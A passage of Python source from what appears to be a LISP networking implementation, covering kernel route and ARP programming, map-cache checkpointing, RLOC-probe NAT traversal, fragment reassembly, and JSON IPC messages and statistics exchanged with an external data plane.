ipaddr[3] = str(i)
addr = ".".join(ipaddr)
if (addr in arp_entries): continue
if (addr == local): continue
nh = addr
break
#endfor
if (nh == None):
lprint("Address allocation failed for vlan4094, cannot program " + \
"hardware")
return
#endif
#
# Derive MAC address from VTEP address an associate it with the next-hop
# address on vlan4094. This MAC address must be the MAC address on the
# foreign VTEP configure with "ip virtual-router mac-address <mac>".
#
rloc_octets = rloc.split(".")
octet1 = lisp_hex_string(rloc_octets[1]).zfill(2)
octet2 = lisp_hex_string(rloc_octets[2]).zfill(2)
octet3 = lisp_hex_string(rloc_octets[3]).zfill(2)
mac = "00:00:00:{}:{}:{}".format(octet1, octet2, octet3)
arista_mac = "0000.00{}.{}{}".format(octet1, octet2, octet3)
arp_command = "arp -i vlan4094 -s {} {}".format(nh, mac)
os.system(arp_command)
#
# Add VXLAN entry for MAC address.
#
vxlan_command = ("mac address-table static {} vlan 4094 " + \
"interface vxlan 1 vtep {}").format(arista_mac, rloc)
lisp_send_to_arista(vxlan_command, None)
#
# Add route now connecting: eid-prefix -> next-hop -> mac-address ->
# VTEP address.
#
route_command = "ip route add {} via {}".format(eid_prefix, nh)
os.system(route_command)
lprint("Hardware programmed with commands:")
route_command = route_command.replace(eid_prefix, green(eid_prefix, False))
lprint(" " + route_command)
lprint(" " + arp_command)
vxlan_command = vxlan_command.replace(rloc, red(rloc, False))
lprint(" " + vxlan_command)
return
#enddef
#
# lisp_clear_hardware_walk
#
# Remove EID-prefix from kernel.
#
def lisp_clear_hardware_walk(mc, parms):
prefix = mc.eid.print_prefix_no_iid()
os.system("ip route delete {}".format(prefix))
return([True, None])
#enddef
#
# lisp_clear_map_cache
#
# Just create a new lisp_cache data structure. But if we have to program
# hardware, traverse the map-cache.
#
def lisp_clear_map_cache():
global lisp_map_cache, lisp_rloc_probe_list
global lisp_crypto_keys_by_rloc_encap, lisp_crypto_keys_by_rloc_decap
global lisp_rtr_list, lisp_gleaned_groups
global lisp_no_map_request_rate_limit
clear = bold("User cleared", False)
count = lisp_map_cache.cache_count
lprint("{} map-cache with {} entries".format(clear, count))
if (lisp_program_hardware):
lisp_map_cache.walk_cache(lisp_clear_hardware_walk, None)
#endif
lisp_map_cache = lisp_cache()
#
# Clear rate-limiting temporarily.
#
lisp_no_map_request_rate_limit = lisp_get_timestamp()
#
# Need to clear the RLOC-probe list or else we'll have RLOC-probes
# create incomplete RLOC-records.
#
lisp_rloc_probe_list = {}
#
# Also clear the encap and decap lisp-crypto arrays.
#
lisp_crypto_keys_by_rloc_encap = {}
lisp_crypto_keys_by_rloc_decap = {}
#
# If we are an ITR, clear the RTR-list so a new set of default routes can
# be added when the next Info-Reply comes in.
#
lisp_rtr_list = {}
#
# Clear gleaned groups data structure.
#
lisp_gleaned_groups = {}
#
# Tell external data-plane.
#
lisp_process_data_plane_restart(True)
return
#enddef
#
# lisp_encapsulate_rloc_probe
#
# Input to this function is a RLOC-probe Map-Request and the NAT-traversal
# information for an ETR that sits behind a NAT. We need to get the RLOC-probe
# through the NAT so we have to data encapsulated with a source-port of 4341
# and a destination address and port that was translated by the NAT. That
# information is in the lisp_nat_info() class.
#
def lisp_encapsulate_rloc_probe(lisp_sockets, rloc, nat_info, packet):
if (len(lisp_sockets) != 4): return
local_addr = lisp_myrlocs[0]
#
# Build Map-Request IP header. Source and destination addresses same as
# the data encapsulation outer header.
#
length = len(packet) + 28
ip = struct.pack("BBHIBBHII", 0x45, 0, socket.htons(length), 0, 64,
17, 0, socket.htonl(local_addr.address), socket.htonl(rloc.address))
ip = lisp_ip_checksum(ip)
udp = struct.pack("HHHH", 0, socket.htons(LISP_CTRL_PORT),
socket.htons(length - 20), 0)
#
# Start data encapsulation logic.
#
packet = lisp_packet(ip + udp + packet)
#
# Setup fields we need for lisp_packet.encode().
#
packet.inner_dest.copy_address(rloc)
packet.inner_dest.instance_id = 0xffffff
packet.inner_source.copy_address(local_addr)
packet.inner_ttl = 64
packet.outer_dest.copy_address(rloc)
packet.outer_source.copy_address(local_addr)
packet.outer_version = packet.outer_dest.afi_to_version()
packet.outer_ttl = 64
packet.encap_port = nat_info.port if nat_info else LISP_DATA_PORT
rloc_str = red(rloc.print_address_no_iid(), False)
if (nat_info):
hostname = " {}".format(blue(nat_info.hostname, False))
probe = bold("RLOC-probe request", False)
else:
hostname = ""
probe = bold("RLOC-probe reply", False)
#endif
lprint(("Data encapsulate {} to {}{} port {} for " + \
"NAT-traversal").format(probe, rloc_str, hostname, packet.encap_port))
#
# Build data encapsulation header.
#
if (packet.encode(None) == None): return
packet.print_packet("Send", True)
raw_socket = lisp_sockets[3]
packet.send_packet(raw_socket, packet.outer_dest)
del(packet)
return
#enddef
#
# lisp_get_default_route_next_hops
#
# Put the interface names of each next-hop for the IPv4 default in an array
# and return to caller. The array has elements of [<device>, <nh>].
#
def lisp_get_default_route_next_hops():
#
# Get default route next-hop info differently for MacOS.
#
if (lisp_is_macos()):
cmd = "route -n get default"
fields = getoutput(cmd).split("\n")
gw = interface = None
for f in fields:
if (f.find("gateway: ") != -1): gw = f.split(": ")[1]
if (f.find("interface: ") != -1): interface = f.split(": ")[1]
#endfor
return([[interface, gw]])
#endif
#
# Get default route next-hop info for Linuxes.
#
cmd = "ip route | egrep 'default via'"
default_routes = getoutput(cmd).split("\n")
next_hops = []
for route in default_routes:
if (route.find(" metric ") != -1): continue
r = route.split(" ")
try:
via_index = r.index("via") + 1
if (via_index >= len(r)): continue
dev_index = r.index("dev") + 1
if (dev_index >= len(r)): continue
except:
continue
#endtry
next_hops.append([r[dev_index], r[via_index]])
#endfor
return(next_hops)
#enddef
#
# lisp_get_host_route_next_hop
#
# For already installed host route, get next-hop.
#
def lisp_get_host_route_next_hop(rloc):
cmd = "ip route | egrep '{} via'".format(rloc)
route = getoutput(cmd).split(" ")
try: index = route.index("via") + 1
except: return(None)
if (index >= len(route)): return(None)
return(route[index])
#enddef
#
# lisp_install_host_route
#
# Install/deinstall host route.
#
def lisp_install_host_route(dest, nh, install):
install = "add" if install else "delete"
nh_str = "none" if nh == None else nh
lprint("{} host-route {}, nh {}".format(install.title(), dest, nh_str))
if (nh == None):
ar = "ip route {} {}/32".format(install, dest)
else:
ar = "ip route {} {}/32 via {}".format(install, dest, nh)
#endif
os.system(ar)
return
#enddef
#
# lisp_checkpoint
#
# This function will write entries from the checkpoint array to the checkpoint
# file "lisp.checkpoint".
#
def lisp_checkpoint(checkpoint_list):
if (lisp_checkpoint_map_cache == False): return
f = open(lisp_checkpoint_filename, "w")
for entry in checkpoint_list:
f.write(entry + "\n")
#endfor
f.close()
lprint("{} {} entries to file '{}'".format(bold("Checkpoint", False),
len(checkpoint_list), lisp_checkpoint_filename))
return
#enddef
#
# lisp_load_checkpoint
#
# Read entries from checkpoint file and write to map cache. Check function
# lisp_write_checkpoint_entry() for entry format description.
#
def lisp_load_checkpoint():
if (lisp_checkpoint_map_cache == False): return
if (os.path.exists(lisp_checkpoint_filename) == False): return
f = open(lisp_checkpoint_filename, "r")
count = 0
for entry in f:
count += 1
e = entry.split(" rloc ")
rlocs = [] if (e[1] in ["native-forward\n", "\n"]) else \
e[1].split(", ")
rloc_set = []
for rloc in rlocs:
rloc_entry = lisp_rloc(False)
r = rloc.split(" ")
rloc_entry.rloc.store_address(r[0])
rloc_entry.priority = int(r[1])
rloc_entry.weight = int(r[2])
rloc_set.append(rloc_entry)
#endfor
mc = lisp_mapping("", "", rloc_set)
if (mc != None):
mc.eid.store_prefix(e[0])
mc.checkpoint_entry = True
mc.map_cache_ttl = LISP_NMR_TTL * 60
if (rloc_set == []): mc.action = LISP_NATIVE_FORWARD_ACTION
mc.add_cache()
continue
#endif
count -= 1
#endfor
f.close()
lprint("{} {} map-cache entries from file '{}'".format(
bold("Loaded", False), count, lisp_checkpoint_filename))
return
#enddef
#
# lisp_write_checkpoint_entry
#
# Write one map-cache entry to checkpoint array list. The format of a
# checkpoint entry is:
#
# [<iid>]<eid-prefix> rloc <rloc>, <rloc>, ...
#
# where <rloc> is formatted as:
#
# <rloc-address> <priority> <weight>
#
def lisp_write_checkpoint_entry(checkpoint_list, mc):
if (lisp_checkpoint_map_cache == False): return
entry = "{} rloc ".format(mc.eid.print_prefix())
for rloc_entry in mc.rloc_set:
if (rloc_entry.rloc.is_null()): continue
entry += "{} {} {}, ".format(rloc_entry.rloc.print_address_no_iid(),
rloc_entry.priority, rloc_entry.weight)
#endfor
if (mc.rloc_set != []):
entry = entry[0:-2]
elif (mc.action == LISP_NATIVE_FORWARD_ACTION):
entry += "native-forward"
#endif
checkpoint_list.append(entry)
return
#enddef
#
# lisp_check_dp_socket
#
# Check if lisp-ipc-data-plane socket exists.
#
def lisp_check_dp_socket():
socket_name = lisp_ipc_dp_socket_name
if (os.path.exists(socket_name) == False):
dne = bold("does not exist", False)
lprint("Socket '{}' {}".format(socket_name, dne))
return(False)
#endif
return(True)
#enddef
#
# lisp_write_to_dp_socket
#
# Check if lisp-ipc-data-plane socket exists.
#
def lisp_write_to_dp_socket(entry):
try:
rec = json.dumps(entry)
write = bold("Write IPC", False)
lprint("{} record to named socket: '{}'".format(write, rec))
lisp_ipc_dp_socket.sendto(rec, lisp_ipc_dp_socket_name)
except:
lprint("Failed to write IPC record to named socket: '{}'".format(rec))
#endtry
return
#enddef
#
# lisp_write_ipc_keys
#
# Security keys have changed for an RLOC. Find all map-cache entries that are
# affected. The lisp_rloc_probe_rlocs has the list of EIDs for a given RLOC
# address. Tell the external data-plane for each one.
#
def lisp_write_ipc_keys(rloc):
addr_str = rloc.rloc.print_address_no_iid()
port = rloc.translated_port
if (port != 0): addr_str += ":" + str(port)
if (addr_str not in lisp_rloc_probe_list): return
for r, e, g in lisp_rloc_probe_list[addr_str]:
mc = lisp_map_cache.lookup_cache(e, True)
if (mc == None): continue
lisp_write_ipc_map_cache(True, mc)
#endfor
return
#enddef
#
# lisp_write_ipc_map_cache
#
# Write a map-cache entry to named socket "lisp-ipc-data-plane".
#
def lisp_write_ipc_map_cache(add_or_delete, mc, dont_send=False):
if (lisp_i_am_etr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format.
#
add = "add" if add_or_delete else "delete"
entry = { "type" : "map-cache", "opcode" : add }
multicast = (mc.group.is_null() == False)
if (multicast):
entry["eid-prefix"] = mc.group.print_prefix_no_iid()
entry["rles"] = []
else:
entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
entry["rlocs"] = []
#endif
entry["instance-id"] = str(mc.eid.instance_id)
if (multicast):
if (len(mc.rloc_set) >= 1 and mc.rloc_set[0].rle):
for rle_node in mc.rloc_set[0].rle.rle_forwarding_list:
addr = rle_node.address.print_address_no_iid()
port = str(4341) if rle_node.translated_port == 0 else \
str(rle_node.translated_port)
r = { "rle" : addr, "port" : port }
ekey, ikey = rle_node.get_encap_keys()
r = lisp_build_json_keys(r, ekey, ikey, "encrypt-key")
entry["rles"].append(r)
#endfor
#endif
else:
for rloc in mc.rloc_set:
if (rloc.rloc.is_ipv4() == False and rloc.rloc.is_ipv6() == False):
continue
#endif
if (rloc.up_state() == False): continue
port = str(4341) if rloc.translated_port == 0 else \
str(rloc.translated_port)
r = { "rloc" : rloc.rloc.print_address_no_iid(), "priority" :
str(rloc.priority), "weight" : str(rloc.weight), "port" :
port }
ekey, ikey = rloc.get_encap_keys()
r = lisp_build_json_keys(r, ekey, ikey, "encrypt-key")
entry["rlocs"].append(r)
#endfor
#endif
if (dont_send == False): lisp_write_to_dp_socket(entry)
return(entry)
#enddef
#
# lisp_write_ipc_decap_key
#
# In the lisp-etr process, write an RLOC record to the ipc-data-plane socket.
#
def lisp_write_ipc_decap_key(rloc_addr, keys):
if (lisp_i_am_itr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Get decryption key. If there is none, do not send message.
#
if (keys == None or len(keys) == 0 or keys[1] == None): return
ekey = keys[1].encrypt_key
ikey = keys[1].icv_key
#
# Write record in JSON format. Store encryption key.
#
rp = rloc_addr.split(":")
if (len(rp) == 1):
entry = { "type" : "decap-keys", "rloc" : rp[0] }
else:
entry = { "type" : "decap-keys", "rloc" : rp[0], "port" : rp[1] }
#endif
entry = lisp_build_json_keys(entry, ekey, ikey, "decrypt-key")
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_build_json_keys
#
# Build the following for both the ITR encryption side and the ETR decryption
# side.
#
def lisp_build_json_keys(entry, ekey, ikey, key_type):
if (ekey == None): return(entry)
entry["keys"] = []
key = { "key-id" : "1", key_type : ekey, "icv-key" : ikey }
entry["keys"].append(key)
return(entry)
#enddef
#
# lisp_write_ipc_database_mappings
#
# In the lisp-etr process, write an RLOC record to the ipc-data-plane socket.
#
def lisp_write_ipc_database_mappings(ephem_port):
if (lisp_i_am_etr == False): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format. Store encryption key.
#
entry = { "type" : "database-mappings", "database-mappings" : [] }
#
# Write only IPv4 and IPv6 EIDs.
#
for db in lisp_db_list:
if (db.eid.is_ipv4() == False and db.eid.is_ipv6() == False): continue
record = { "instance-id" : str(db.eid.instance_id),
"eid-prefix" : db.eid.print_prefix_no_iid() }
entry["database-mappings"].append(record)
#endfor
lisp_write_to_dp_socket(entry)
#
# Write ephemeral NAT port an external data-plane needs to receive
# encapsulated packets from the RTR.
#
entry = { "type" : "etr-nat-port", "port" : ephem_port }
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_write_ipc_interfaces
#
# In the lisp-etr process, write an RLOC record to the ipc-data-plane socket.
#
def lisp_write_ipc_interfaces():
if (lisp_i_am_etr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format. Store encryption key.
#
entry = { "type" : "interfaces", "interfaces" : [] }
for interface in list(lisp_myinterfaces.values()):
if (interface.instance_id == None): continue
record = { "interface" : interface.device,
"instance-id" : str(interface.instance_id) }
entry["interfaces"].append(record)
#endfor
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_parse_auth_key
#
# Look for values for "authentication-key" in the various forms of:
#
# <password>
# [<key-id>]<password>
# [<key-id>]<password> [<key-id>]<password> [<key-id>]<password>
#
# Return a auth_key{} where the keys from the dictionary array are type
# integers and the values are type string.
#
def lisp_parse_auth_key(value):
values = value.split("[")
auth_key = {}
if (len(values) == 1):
auth_key[0] = value
return(auth_key)
#endif
for v in values:
if (v == ""): continue
index = v.find("]")
key_id = v[0:index]
try: key_id = int(key_id)
except: return
auth_key[key_id] = v[index+1::]
#endfor
return(auth_key)
#enddef
#
# lisp_reassemble
#
# Reassemble an IPv4 datagram. The result is a LISP encapsulated packet.
#
# An entry in the queue is a multi-tuple of:
#
# <frag-offset>, <frag-length>, <packet-with-header>, <last-frag-is-true>
#
# When it is not a LISP/VXLAN encapsualted packet, the multi-tuple will be
# for the first fragment:
#
# <frag-offset>, <frag-length>, None, <last-frag-is-true>
#
def lisp_reassemble(packet):
fo = socket.ntohs(struct.unpack("H", packet[6:8])[0])
#
# Not a fragment, return packet and process.
#
if (fo == 0 or fo == 0x4000): return(packet)
#
# Get key fields from fragment.
#
ident = socket.ntohs(struct.unpack("H", packet[4:6])[0])
fl = socket.ntohs(struct.unpack("H", packet[2:4])[0])
last_frag = (fo & 0x2000 == 0 and (fo & 0x1fff) != 0)
entry = [(fo & 0x1fff) * 8, fl - 20, packet, last_frag]
#
# If first fragment, check to see if LISP packet. Do not reassemble if
# source or destination port is not 4341, 8472 or 4789. But add this to
# the queue so when other fragments come in, we know to not queue them.
# If other fragments came in before the first fragment, remove them from
# the queue.
#
if (fo == 0x2000):
sport, dport = struct.unpack("HH", packet[20:24])
sport = socket.ntohs(sport)
dport = socket.ntohs(dport)
if (dport not in [4341, 8472, 4789] and sport != 4341):
lisp_reassembly_queue[ident] = []
entry[2] = None
#endif
#endif
#
# Initialized list if first fragment. Indexed by IPv4 Ident.
#
if (ident not in lisp_reassembly_queue):
lisp_reassembly_queue[ident] = []
#endif
#
# Get fragment queue based on IPv4 Ident.
#
queue = lisp_reassembly_queue[ident]
#
# Do not queue fragment if first fragment arrived and we determined its
# not a LISP encapsulated packet.
#
if (len(queue) == 1 and queue[0][2] == None):
dprint("Drop non-LISP encapsulated fragment 0x{}".format( \
lisp_hex_string(ident).zfill(4)))
return(None)
#endif
#
# Insert in sorted order.
#
queue.append(entry)
queue = sorted(queue)
#
# Print addresses.
#
addr = lisp_address(LISP_AFI_IPV4, "", 32, 0)
addr.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
src = addr.print_address_no_iid()
addr.address = socket.ntohl(struct.unpack("I", packet[16:20])[0])
dst = addr.print_address_no_iid()
addr = red("{} -> {}".format(src, dst), False)
dprint("{}{} fragment, RLOCs: {}, packet 0x{}, frag-offset: 0x{}".format( \
bold("Received", False), " non-LISP encapsulated" if \
entry[2] == None else "", addr, lisp_hex_string(ident).zfill(4),
lisp_hex_string(fo).zfill(4)))
#
# Check if all fragments arrived. First check if first and last fragments
# are in queue.
#
if (queue[0][0] != 0 or queue[-1][3] == False): return(None)
last_entry = queue[0]
for frag in queue[1::]:
fo = frag[0]
last_fo, last_fl = last_entry[0], last_entry[1]
if (last_fo + last_fl != fo): return(None)
last_entry = frag
#endfor
lisp_reassembly_queue.pop(ident)
#
# If we did not return, we have all fragments. Now append them. Keep the
# IP header in the first fragment but remove in each other fragment.
#
packet = queue[0][2]
for frag in queue[1::]: packet += frag[2][20::]
dprint("{} fragments arrived for packet 0x{}, length {}".format( \
bold("All", False), lisp_hex_string(ident).zfill(4), len(packet)))
#
# Fix length and frag-offset field before returning and fixup checksum.
#
length = socket.htons(len(packet))
header = packet[0:2] + struct.pack("H", length) + packet[4:6] + \
struct.pack("H", 0) + packet[8:10] + struct.pack("H", 0) + \
packet[12:20]
header = lisp_ip_checksum(header)
return(header + packet[20::])
#enddef
#
# lisp_get_crypto_decap_lookup_key
#
# Return None if we cannot find <addr>:<<port> or <addr>:0 in lisp_crypto_
# keys_by_rloc_decap{}.
#
def lisp_get_crypto_decap_lookup_key(addr, port):
addr_str = addr.print_address_no_iid() + ":" + str(port)
if (addr_str in lisp_crypto_keys_by_rloc_decap): return(addr_str)
addr_str = addr.print_address_no_iid()
if (addr_str in lisp_crypto_keys_by_rloc_decap): return(addr_str)
#
# We are at non-NAT based xTR. We need to get the keys from an RTR
# or another non-NAT based xTR. Move addr+port to addr.
#
for ap in lisp_crypto_keys_by_rloc_decap:
a = ap.split(":")
if (len(a) == 1): continue
a = a[0] if len(a) == 2 else ":".join(a[0:-1])
if (a == addr_str):
keys = lisp_crypto_keys_by_rloc_decap[ap]
lisp_crypto_keys_by_rloc_decap[addr_str] = keys
return(addr_str)
#endif
#endfor
return(None)
#enddef
#
# lisp_build_crypto_decap_lookup_key
#
# Decide to return <addr>:<port> or <addr> depending if the RLOC is behind
# a NAT. This is used on the RTR. Check the lisp probing cache. If we find
# an RLOC with a port number stored, then it is behind a NAT. Otherwise,
# the supplied port is not relevant and we want to create a "port-less" decap
# entry for an xTR that is in public address space.
#
def lisp_build_crypto_decap_lookup_key(addr, port):
addr = addr.print_address_no_iid()
addr_and_port = addr + ":" + str(port)
if (lisp_i_am_rtr):
if (addr in lisp_rloc_probe_list): return(addr)
#
# Have to check NAT cache to see if RLOC is translated. If not, this
# is an xTR in public space. We'll have to change this in the future
# so we don't do a full table traversal. But this only happensu
#
for nat_info in list(lisp_nat_state_info.values()):
for nat in nat_info:
if (addr == nat.address): return(addr_and_port)
#endfor
#endif
return(addr)
#endif
return(addr_and_port)
#enddef
#
# lisp_is_rloc_probe_request
#
# Pass LISP first byte to test for 0x12, a Map-Request RLOC-probe.
#
def lisp_is_rloc_probe_request(lisp_type):
lisp_type = struct.unpack("B", lisp_type)[0]
return(lisp_type == 0x12)
#enddef
#
# lisp_is_rloc_probe_reply
#
# Pass LISP first byte to test for 0x28, a Map-Reply RLOC-probe.
#
def lisp_is_rloc_probe_reply(lisp_type):
lisp_type = struct.unpack("B", lisp_type)[0]
return(lisp_type == 0x28)
#enddef
#
# lisp_is_rloc_probe
#
# If this is a RLOC-probe received by the data-plane (from a pcap filter),
# then return source address, source port, ttl, and position packet to the
# beginning of the LISP header. The packet pointer entering this function is
# the beginning of an IPv4 header.
#
# If rr (request-or-reply) is:
#
# 0: Check for Map-Request RLOC-probe (ETR case)
# 1: Check for Map-Reply RLOC-probe (ITR case)
# -1: Check for either (RTR case)
#
# Return packet pointer untouched if not an RLOC-probe. If it is an RLOC-probe
# request or reply from ourselves, return packet pointer None and source None.
#
def lisp_is_rloc_probe(packet, rr):
udp = (struct.unpack("B", packet[9:10])[0] == 17)
if (udp == False): return([packet, None, None, None])
sport = struct.unpack("H", packet[20:22])[0]
dport = struct.unpack("H", packet[22:24])[0]
is_lisp = (socket.htons(LISP_CTRL_PORT) in [sport, dport])
if (is_lisp == False): return([packet, None, None, None])
if (rr == 0):
probe = lisp_is_rloc_probe_request(packet[28:29])
if (probe == False): return([packet, None, None, None])
elif (rr == 1):
probe = lisp_is_rloc_probe_reply(packet[28:29])
if (probe == False): return([packet, None, None, None])
elif (rr == -1):
probe = lisp_is_rloc_probe_request(packet[28:29])
if (probe == False):
probe = lisp_is_rloc_probe_reply(packet[28:29])
if (probe == False): return([packet, None, None, None])
#endif
#endif
#
# Get source address, source port, and TTL. Decrement TTL.
#
source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
source.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
#
# If this is a RLOC-probe from ourselves, drop.
#
if (source.is_local()): return([None, None, None, None])
#
# Accept, and return source, port, and ttl to caller.
#
source = source.print_address_no_iid()
port = socket.ntohs(struct.unpack("H", packet[20:22])[0])
ttl = struct.unpack("B", packet[8:9])[0] - 1
packet = packet[28::]
r = bold("Receive(pcap)", False)
f = bold("from " + source, False)
p = lisp_format_packet(packet)
lprint("{} {} bytes {} {}, packet: {}".format(r, len(packet), f, port, p))
return([packet, source, port, ttl])
#enddef
#
# lisp_ipc_write_xtr_parameters
#
# When an external data-plane is running, write the following parameters
# to it:
#
# ipc = { "type" : "xtr-parameters", "control-plane-logging" : False,
# "data-plane-logging" : False, "rtr" : False }
#
def lisp_ipc_write_xtr_parameters(cp, dp):
if (lisp_ipc_dp_socket == None): return
ipc = { "type" : "xtr-parameters", "control-plane-logging" : cp,
"data-plane-logging" : dp, "rtr" : lisp_i_am_rtr }
lisp_write_to_dp_socket(ipc)
return
#enddef
#
# lisp_external_data_plane
#
# Return True if an external data-plane is running. That means that "ipc-data-
# plane = yes" is configured or the lisp-xtr go binary is running.
#
def lisp_external_data_plane():
cmd = 'egrep "ipc-data-plane = yes" ./lisp.config'
if (getoutput(cmd) != ""): return(True)
if (os.getenv("LISP_RUN_LISP_XTR") != None): return(True)
return(False)
#enddef
#
# lisp_process_data_plane_restart
#
# The external data-plane has restarted. We will touch the lisp.config file so
# all configuration information is sent and then traverse the map-cache
# sending each entry to the data-plane so it can regain its state.
#
# This function will also clear the external data-plane map-cache when a user
# clears the map-cache in the lisp-itr or lisp-rtr process.
#
# { "type" : "restart" }
#
def lisp_process_data_plane_restart(do_clear=False):
os.system("touch ./lisp.config")
jdata = { "type" : "entire-map-cache", "entries" : [] }
if (do_clear == False):
entries = jdata["entries"]
lisp_map_cache.walk_cache(lisp_ipc_walk_map_cache, entries)
#endif
lisp_write_to_dp_socket(jdata)
return
#enddef
#
# lisp_process_data_plane_stats
#
# { "type" : "statistics", "entries" :
# [ { "instance-id" : "<iid>", "eid-prefix" : "<eid>", "rlocs" : [
# { "rloc" : "<rloc-1>", "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : "<timestamp>" }, ...
# { "rloc" : "<rloc-n>", "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <system-uptime> } ], ... }
# ]
# }
#
def lisp_process_data_plane_stats(msg, lisp_sockets, lisp_port):
if ("entries" not in msg):
lprint("No 'entries' in stats IPC message")
return
#endif
if (type(msg["entries"]) != list):
lprint("'entries' in stats IPC message must be an array")
return
#endif
for msg in msg["entries"]:
if ("eid-prefix" not in msg):
lprint("No 'eid-prefix' in stats IPC message")
continue
#endif
eid_str = msg["eid-prefix"]
if ("instance-id" not in msg):
lprint("No 'instance-id' in stats IPC message")
continue
#endif
iid = int(msg["instance-id"])
#
# Lookup EID-prefix in map-cache.
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(eid_str)
mc = lisp_map_cache_lookup(None, eid)
if (mc == None):
lprint("Map-cache entry for {} not found for stats update". \
format(eid_str))
continue
#endif
if ("rlocs" not in msg):
lprint("No 'rlocs' in stats IPC message for {}".format( \
eid_str))
continue
#endif
if (type(msg["rlocs"]) != list):
lprint("'rlocs' in stats IPC message must be an array")
continue
#endif
ipc_rlocs = msg["rlocs"]
#
# Loop through RLOCs in IPC message.
#
for ipc_rloc in ipc_rlocs:
if ("rloc" not in ipc_rloc): continue
rloc_str = ipc_rloc["rloc"]
if (rloc_str == "no-address"): continue
rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
rloc.store_address(rloc_str)
rloc_entry = mc.get_rloc(rloc)
if (rloc_entry == None): continue
#
# Update stats.
#
pc = 0 if ("packet-count" not in ipc_rloc) else \
ipc_rloc["packet-count"]
bc = 0 if ("byte-count" not in ipc_rloc) else \
ipc_rloc["byte-count"]
ts = 0 if ("seconds-last-packet" not in ipc_rloc) else \
ipc_rloc["seconds-last-packet"]
rloc_entry.stats.packet_count += pc
rloc_entry.stats.byte_count += bc
rloc_entry.stats.last_increment = lisp_get_timestamp() - ts
lprint("Update stats {}/{}/{}s for {} RLOC {}".format(pc, bc,
ts, eid_str, rloc_str))
#endfor
#
# Check if this map-cache entry needs refreshing.
#
if (mc.group.is_null() and mc.has_ttl_elapsed()):
eid_str = green(mc.print_eid_tuple(), False)
lprint("Refresh map-cache entry {}".format(eid_str))
lisp_send_map_request(lisp_sockets, lisp_port, None, mc.eid, None)
#endif
#endfor
return
#enddef
#
# lisp_process_data_plane_decap_stats
#
# { "type" : "decap-statistics",
# "no-decrypt-key" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "outer-header-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "bad-inner-version" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "good-packets" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "ICV-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "checksum-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> }
# }
#
# If are an RTR, we can process the stats directly. If are an ITR we need
# to send an IPC message the the lisp-etr process.
#
# Variable "msg" is a string and not a byte string. Caller converts.
#
def lisp_process_data_plane_decap_stats(msg, lisp_ipc_socket):
#
# Send IPC message to lisp-etr process. Variable 'msg' is a dict array.
# Needs to be passed in IPC message as a string.
#
if (lisp_i_am_itr):
lprint("Send decap-stats IPC message to lisp-etr process")
ipc = "stats%{}".format(json.dumps(msg))
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
return
#endif
#
# Process stats counters in lisp-etr and lisp-rtr processes. Variable 'msg'
# is a dictionary array when the ITR/RTR is processing msg. When an ETR
# is processing it, it recevied a json string from the ITR so it needs
# to convert to a dictionary array.
#
ipc = bold("IPC", False)
lprint("Process decap-stats {} message: '{}'".format(ipc, msg))
if (lisp_i_am_etr): msg = json.loads(msg)
key_names = ["good-packets", "ICV-error", "checksum-error",
"lisp-header-error", "no-decrypt-key", "bad-inner-version",
"outer-header-error"]
for key_name in key_names:
pc = 0 if (key_name not in msg) else msg[key_name]["packet-count"]
lisp_decap_stats[key_name].packet_count += pc
bc = 0 if (key_name not in msg) else msg[key_name]["byte-count"]
lisp_decap_stats[key_name].byte_count += bc
ts = 0 if (key_name not in msg) else \
msg[key_name]["seconds-last-packet"]
lisp_decap_stats[key_name].last_increment = lisp_get_timestamp() - ts
#endfor
return
#enddef
#
# lisp_process_punt
#
# Another data-plane is punting a packet to us so we can discover a source
# EID, send a map-request, or store statistics data. The format of the JSON
# messages are for types: "discovery", "restart", "statistics", and "decap-
# statistics". This function calls functions for the stats and restart types
# but this function processes logic for:
#
# { "type" : "discovery", "source-eid" : <eid-source-address>,
# "dest-eid" : <eid-dest-address>, "interface" : "<device-name>",
# "instance-id" : <iid> }
#
# And:
#
def lisp_process_punt(punt_socket, lisp_send_sockets, lisp_ephem_port):
message, source = punt_socket.recvfrom(4000)
msg = json.loads(message)
if (type(msg) != dict):
lprint("Invalid punt message from {}, not in JSON format". \
format(source))
return
#endif
punt = bold("Punt", False)
lprint("{} message from '{}': '{}'".format(punt, source, msg))
if ("type" not in msg):
lprint("Punt IPC message has no 'type' key")
return
#endif
#
# Process statistics message.
#
if (msg["type"] == "statistics"):
lisp_process_data_plane_stats(msg, lisp_send_sockets, lisp_ephem_port)
return
#endif
if (msg["type"] == "decap-statistics"):
lisp_process_data_plane_decap_stats(msg, punt_socket)
return
#endif
#
# Process statistics message.
#
if (msg["type"] == "restart"):
lisp_process_data_plane_restart()
return
#endif
#
# Process possible punt packet discovery message.
#
if (msg["type"] != "discovery"):
lprint("Punt IPC message has wrong format")
return
#endif
if ("interface" not in msg):
lprint("Invalid punt message from {}, required keys missing". \
format(source))
return
#endif
#
# Drop control-messages designated as instance-ID 0xffffff (or -1 in JSON).
#
device = msg["interface"]
if (device == ""):
